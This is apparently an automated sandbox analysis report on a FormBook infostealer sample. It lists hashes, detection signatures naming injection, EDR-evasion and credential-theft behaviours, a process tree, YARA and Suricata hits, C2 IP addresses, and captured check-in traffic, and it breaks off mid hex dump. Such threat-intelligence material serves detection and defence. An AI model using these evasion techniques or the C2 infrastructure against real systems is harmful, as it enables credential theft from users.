Edit tour

Windows Analysis Report
ydJaT4b5N8.exe

Overview

General Information

Sample name:	ydJaT4b5N8.exe renamed because original name is a hash value
Original sample name:	f649cb30517d1962e1fcf02cdd1e7cec98731954b308f3c61bdb8b8530a44f18.exe
Analysis ID:	1588745
MD5:	fee446d6526018c56dad7b2a1d9985d9
SHA1:	72bef49603c18177836454c60be5c8efcdafa276
SHA256:	f649cb30517d1962e1fcf02cdd1e7cec98731954b308f3c61bdb8b8530a44f18
Tags:	exeFormbookuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

ydJaT4b5N8.exe (PID: 1528 cmdline: "C:\Users\user\Desktop\ydJaT4b5N8.exe" MD5: FEE446D6526018C56DAD7B2A1D9985D9)

ydJaT4b5N8.exe (PID: 7632 cmdline: "C:\Users\user\Desktop\ydJaT4b5N8.exe" MD5: FEE446D6526018C56DAD7B2A1D9985D9)

mErdTxurOiTQQ.exe (PID: 1072 cmdline: "C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

fontview.exe (PID: 7820 cmdline: "C:\Windows\SysWOW64\fontview.exe" MD5: 8324ECE6961ADBE6120CCE9E0BC05F76)

mErdTxurOiTQQ.exe (PID: 1088 cmdline: "C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 7992 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000C.00000002.3127827624.0000000004150000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.1660637052.0000000001260000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.3123177691.0000000000170000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.3127701911.0000000004100000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.3129343241.0000000005450000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.1659559960.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.1662457290.00000000016C0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.3126887129.0000000002570000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: ydJaT4b5N8.exe PID: 1528	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.ydJaT4b5N8.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
10.2.ydJaT4b5N8.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T05:04:46.506221+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49977	13.248.169.48	80	TCP
2025-01-11T05:04:48.009182+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49978	13.248.169.48	80	TCP
2025-01-11T05:04:50.545903+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49979	13.248.169.48	80	TCP
2025-01-11T05:04:58.746170+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49982	209.74.79.42	80	TCP
2025-01-11T05:05:01.293217+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49983	209.74.79.42	80	TCP
2025-01-11T05:05:03.815682+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49984	209.74.79.42	80	TCP
2025-01-11T05:05:13.082811+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49986	45.113.82.65	80	TCP
2025-01-11T05:05:15.616078+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49987	45.113.82.65	80	TCP
2025-01-11T05:05:18.191564+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49988	45.113.82.65	80	TCP
2025-01-11T05:05:26.350272+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49990	67.223.118.94	80	TCP
2025-01-11T05:05:28.930527+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49991	67.223.118.94	80	TCP
2025-01-11T05:05:31.431788+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49992	67.223.118.94	80	TCP
2025-01-11T05:05:40.063444+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49994	192.186.57.30	80	TCP
2025-01-11T05:05:42.618553+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49995	192.186.57.30	80	TCP
2025-01-11T05:05:45.180128+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49996	192.186.57.30	80	TCP
2025-01-11T05:05:54.271889+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49998	104.21.48.1	80	TCP
2025-01-11T05:05:56.818804+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49999	104.21.48.1	80	TCP
2025-01-11T05:05:59.365915+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50000	104.21.48.1	80	TCP

HTTP traffic detected: POST /3zfl/ HTTP/1.1Host: www.10000.spaceAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-usOrigin: http://www.10000.spaceContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheContent-Length: 215Connection: closeReferer: http://www.10000.space/3zfl/User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like GeckoData Raw: 46 54 3d 51 78 2b 58 6f 44 4d 46 2f 47 53 51 2b 33 65 72 2b 77 7a 2f 37 54 2b 2f 5a 6c 31 4d 41 5a 58 48 6b 53 31 77 52 2b 64 47 36 34 45 49 38 39 71 36 59 7a 4a 51 51 6e 2b 7a 4b 71 43 4a 4c 50 4b 51 35 32 70 4a 44 44 6a 6f 59 65 74 6b 69 75 68 61 2f 6b 45 79 76 31 54 46 70 38 42 68 30 6c 6f 73 46 32 61 42 31 46 36 7a 48 73 6e 41 4c 6e 66 6c 54 74 72 51 6a 59 56 4f 72 30 76 49 47 38 36 6e 68 67 69 6e 57 68 4b 46 6c 33 4a 71 66 54 56 6b 7a 48 67 67 30 76 65 78 41 7a 6a 58 76 66 74 39 68 4c 30 2f 61 5a 4a 7a 77 30 43 64 45 55 44 7a 65 73 62 68 73 69 6d 61 2b 6d 52 62 36 72 38 2b 65 65 6f 57 4f 61 46 4a 72 4f 36 45 74 70 6e 41 4b 41 3d 3d Data Ascii: FT=Qx+XoDMF/GSQ+3er+wz/7T+/Zl1MAZXHkS1wR+dG64EI89q6YzJQQn+zKqCJLPKQ52pJDDjoYetkiuha/kEyv1TFp8Bh0losF2aB1F6zHsnALnflTtrQjYVOr0vIG86nhginWhKFl3JqfTVkzHgg0vexAzjXvft9hL0/aZJzw0CdEUDzesbhsima+mRb6r8+eeoWOaFJrO6EtpnAKA==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:04:58 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:05:01 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:05:03 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:05:06 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Sat, 11 Jan 2025 04:05:12 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Sat, 11 Jan 2025 04:05:15 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Sat, 11 Jan 2025 04:05:17 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Sat, 11 Jan 2025 04:05:20 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 11 Jan 2025 04:05:26 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 11 Jan 2025 04:05:28 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 